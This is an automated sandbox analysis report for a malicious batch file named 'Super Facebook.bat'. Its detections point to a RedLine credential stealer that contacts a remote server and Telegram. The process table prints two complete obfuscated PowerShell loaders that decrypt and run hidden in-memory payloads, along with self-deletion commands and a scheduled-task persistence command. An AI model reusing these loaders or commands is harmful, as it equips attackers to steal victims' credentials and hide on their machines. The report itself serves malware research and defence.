File name: | Super Facebook.bat |
Full analysis: | https://app.any.run/tasks/6224895d-b143-4c2d-bd22-4a357f1eaf33 |
Verdict: | Malicious activity |
Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
Analysis date: | April 01, 2023, 09:06:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 476D87590230E420D07A4D6FD677BD1D |
SHA1: | 29A2C881B58DD4D9EA40C2208952FDC39627265D |
SHA256: | B6EE5CED40C6A82853E8B5543E139254B0AA9C503B670943818B332297293DD2 |
SSDEEP: | 3072:lKEN79wvVZHRTlfG+7nxmiNQuJ7Mhs6gf/Ks+vCN/MG1XLfzz6PM:ld9w7HRT/7nhiu7ks6gfSsrN/nXjzz6U |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1900 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Super Facebook.bat" " | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
944 | powershell -w hidden -c # | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3364 | "C:\Users\admin\AppData\Local\Temp\Super Facebook.bat.exe" function fi($s){$s.Replace('PCgSe', '')}$TvSl=fi 'CPCgSehangPCgSeeExPCgSetenPCgSesiPCgSeoPCgSenPCgSe';$uPOI=fi 'CrPCgSeePCgSeaPCgSeteDPCgSeePCgSecrypPCgSetorPCgSe';$JkhJ=fi 'TraPCgSensPCgSefPCgSeormPCgSeFinaPCgSelBloPCgSecPCgSekPCgSe';$wwku=fi 'RePCgSeadLPCgSeinesPCgSe';$mfAv=fi 'GePCgSetPCgSeCPCgSeurrePCgSentPPCgSerocePCgSesPCgSesPCgSe';$LndS=fi 'FirPCgSestPCgSe';$IOON=fi 'LoaPCgSedPCgSe';$bGTU=fi 'EnPCgSetryPCgSePoPCgSeinPCgSetPCgSe';$VfMB=fi 'FroPCgSemBPCgSeasePCgSe6PCgSe4PCgSeStPCgSeriPCgSengPCgSe';$OqGp=fi 'InvPCgSeokPCgSeePCgSe';function zkztS($GNZBX){$cqmSn=[System.Security.Cryptography.Aes]::Create();$cqmSn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cqmSn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cqmSn.Key=[System.Convert]::$VfMB('UJReuXeqHSNd3qVXNxnQQ97OnOfSBItpzbPC/7v6/1s=');$cqmSn.IV=[System.Convert]::$VfMB('l+XIW/qwWmYbLeGbOZpElw==');$kDTzC=$cqmSn.$uPOI();$Eyxis=$kDTzC.$JkhJ($GNZBX,0,$GNZBX.Length);$kDTzC.Dispose();$cqmSn.Dispose();$Eyxis;}function JacSh($GNZBX){$BBOCs=New-Object System.IO.MemoryStream(,$GNZBX);$tgHik=New-Object System.IO.MemoryStream;$sqTvH=New-Object System.IO.Compression.GZipStream($BBOCs,[IO.Compression.CompressionMode]::Decompress);$sqTvH.CopyTo($tgHik);$sqTvH.Dispose();$BBOCs.Dispose();$tgHik.Dispose();$tgHik.ToArray();}function OVfya($GNZBX,$xwUmA){[System.Reflection.Assembly]::$IOON([byte[]]$GNZBX).$bGTU.$OqGp($null,$xwUmA);}$ImGss=[System.Linq.Enumerable]::$LndS([System.IO.File]::$wwku([System.IO.Path]::$TvSl([System.Diagnostics.Process]::$mfAv().MainModule.FileName, $null)));$MefbR = $ImGss.Substring(3).Split('\');$TlioL=JacSh (zkztS ([Convert]::$VfMB($MefbR[0])));$MTOPM=JacSh (zkztS ([Convert]::$VfMB($MefbR[1])));OVfya $MTOPM $null;OVfya $TlioL $null; | C:\Users\admin\AppData\Local\Temp\Super Facebook.bat.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3792 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3364);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Super Facebook.bat.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2044 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Media_SC.bat" " | C:\Windows\System32\cmd.exe | Super Facebook.bat.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
1860 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2044);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Super Facebook.bat.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2884 | powershell -w hidden -c # | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3284 | "C:\Users\admin\AppData\Local\Temp\Media_SC.bat.exe" function Db($N){$N.Replace('VxHqi', '')}$VTDs=Db 'LoadVxHqi';$ADZU=Db 'GeVxHqitCVxHqiuVxHqirrenVxHqitVxHqiProcVxHqiesVxHqisVxHqi';$ZmeI=Db 'TVxHqiraVxHqinVxHqisfoVxHqirmVxHqiFiVxHqinVxHqialVxHqiBlocVxHqikVxHqi';$rSlJ=Db 'CrVxHqieaVxHqitVxHqieDeVxHqicrVxHqiypVxHqitoVxHqirVxHqi';$gMtj=Db 'RVxHqieadLVxHqiineVxHqisVxHqi';$mYMQ=Db 'EntVxHqiryPoVxHqiintVxHqi';$uoPM=Db 'ChaVxHqingeVxHqiExtVxHqieVxHqinsVxHqiionVxHqi';$Dnti=Db 'FirsVxHqitVxHqi';$qgyV=Db 'InvVxHqioVxHqikeVxHqi';$AnzF=Db 'FrVxHqioVxHqimBVxHqiasVxHqie6VxHqi4SVxHqitrVxHqiiVxHqingVxHqi';function eduzr($pdIWt){$EYVPv=[System.Security.Cryptography.Aes]::Create();$EYVPv.Mode=[System.Security.Cryptography.CipherMode]::CBC;$EYVPv.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$EYVPv.Key=[System.Convert]::$AnzF('4UFXnX30OSBg/EjlyQ9fjGhlnmbo5rsEBxBqLZcJ7jk=');$EYVPv.IV=[System.Convert]::$AnzF('gBEgzZW1Gz1oSSSKvbA72w==');$FqDFb=$EYVPv.$rSlJ();$VPjkE=$FqDFb.$ZmeI($pdIWt,0,$pdIWt.Length);$FqDFb.Dispose();$EYVPv.Dispose();$VPjkE;}function uzNjg($pdIWt){$wxxQI=New-Object System.IO.MemoryStream(,$pdIWt);$wduUe=New-Object System.IO.MemoryStream;$SBwAO=New-Object System.IO.Compression.GZipStream($wxxQI,[IO.Compression.CompressionMode]::Decompress);$SBwAO.CopyTo($wduUe);$SBwAO.Dispose();$wxxQI.Dispose();$wduUe.Dispose();$wduUe.ToArray();}function uLmzf($pdIWt,$nzezJ){[System.Reflection.Assembly]::$VTDs([byte[]]$pdIWt).$mYMQ.$qgyV($null,$nzezJ);}$xTaoc=[System.Linq.Enumerable]::$Dnti([System.IO.File]::$gMtj([System.IO.Path]::$uoPM([System.Diagnostics.Process]::$ADZU().MainModule.FileName, $null)));$ouXIZ = $xTaoc.Substring(3).Split('\');$ViRjv=uzNjg (eduzr ([Convert]::$AnzF($ouXIZ[0])));$bJeLh=uzNjg (eduzr ([Convert]::$AnzF($ouXIZ[1])));uLmzf $bJeLh $null;uLmzf $ViRjv $null; | C:\Users\admin\AppData\Local\Temp\Media_SC.bat.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3836 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3284);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Media_SC.bat.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2316 | "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Super Facebook" /tr "C:\Users\admin\AppData\Roaming\Super Facebook.bat" | C:\Windows\System32\schtasks.exe | — | Super Facebook.bat.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (3364) Super Facebook.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3364) Super Facebook.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3364) Super Facebook.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3364) Super Facebook.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3284) Media_SC.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3284) Media_SC.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3284) Media_SC.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3284) Media_SC.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3552) wmpnscfg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{29946A26-2048-44CF-8751-F8C9230C4C05}\{29060388-EB75-4A91-B955-DC18C2D3786B} |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | (3552) wmpnscfg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{29946A26-2048-44CF-8751-F8C9230C4C05} |
Operation: | delete key | Name: | (default) |
Value: |
PID | Process | Filename | Type | |
---|---|---|---|---|
3364 | Super Facebook.bat.exe | C:\Users\admin\AppData\Local\Temp\Media_SC.bat | text | |
MD5:43D061A5271571B1907684432C97EB74 | SHA256:B510310377730BD75296E15C8E2183DC21492BC0DEFDD564B46149642E0D381B | |||
944 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jtovxxln.ht5.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
944 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ybnb0dy3.ux5.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3792 | powershell.exe | C:\Users\admin\AppData\Local\Temp\xwblrke3.iun.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1860 | powershell.exe | C:\Users\admin\AppData\Local\Temp\oufuipal.1xr.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1860 | powershell.exe | C:\Users\admin\AppData\Local\Temp\u5uerh01.asz.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3284 | Media_SC.bat.exe | C:\Users\admin\AppData\Local\Temp\adjxfyvl.z5k.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3364 | Super Facebook.bat.exe | C:\Users\admin\AppData\Roaming\Super Facebook.bat | text | |
MD5:476D87590230E420D07A4D6FD677BD1D | SHA256:B6EE5CED40C6A82853E8B5543E139254B0AA9C503B670943818B332297293DD2 | |||
1900 | cmd.exe | C:\Users\admin\AppData\Local\Temp\Super Facebook.bat.exe | executable | |
MD5:EB32C070E658937AA9FA9F3AE629B2B8 | SHA256:70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE | |||
3364 | Super Facebook.bat.exe | C:\Users\admin\AppData\Local\Temp\ng0ssa1d.jqv.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3284 | Media_SC.bat.exe | 108.165.242.134:34097 | — | Heymman Servers Corporation | US | malicious |
— | — | 108.165.242.134:7000 | — | Heymman Servers Corporation | US | malicious |
— | — | 149.154.167.220:443 | api.telegram.org | Telegram Messenger Inc | GB | malicious |
Domain | IP | Reputation |
---|---|---|
api.telegram.org |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE RedLine Stealer TCP CnC net.tcp Init |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC Activity |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC - Id1Response |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC - Id1Response |
— | — | Misc activity | ET HUNTING Telegram API Domain in DNS Lookup |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC Activity |
3364 | Super Facebook.bat.exe | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) |
3364 | Super Facebook.bat.exe | Misc activity | ET HUNTING Telegram API Certificate Observed |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC Activity |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC Activity |